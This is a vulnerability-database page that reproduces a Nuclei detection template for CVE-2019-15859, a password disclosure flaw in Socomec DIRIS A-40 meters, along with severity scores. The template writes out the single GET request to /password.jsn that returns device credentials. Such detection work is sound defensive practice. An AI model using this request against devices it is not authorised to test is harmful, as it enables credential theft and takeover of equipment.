Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-15859
HistoryApr 23, 2021 - 1:38 p.m.

Socomec DIRIS A-40 Devices Password Disclosure

2021-04-2313:38:16
ProjectDiscovery
github.com
9

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.124 Low

EPSS

Percentile

95.4%

Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.

id: CVE-2019-15859

info:
  name: Socomec DIRIS A-40 Devices Password Disclosure
  author: geeknik
  severity: critical
  description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
  impact: |
    An attacker can obtain sensitive information such as passwords, leading to unauthorized access.
  remediation: |
    Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2019/Oct/10
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15859
    - http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
    - https://www.socomec.com/single-circuit-multifunction-meters_en.html
    - http://seclists.org/fulldisclosure/2019/Oct/10
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-15859
    cwe-id: CWE-200
    epss-score: 0.12379
    epss-percentile: 0.95414
    cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: socomec
    product: diris_a-40_firmware
  tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/password.jsn"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/json"

      - type: word
        part: body
        words:
          - "username"
          - "password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a3c62793ae73b1c39c9a409b387f9ca1d1a75dd986bfbc5f158c79e8e8f037140220651d46bdbbec8f8e47abb9c0c9fb10c01314d5db58824d87d8d3116379aa9c56:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.124 Low

EPSS

Percentile

95.4%

Related for NUCLEI:CVE-2019-15859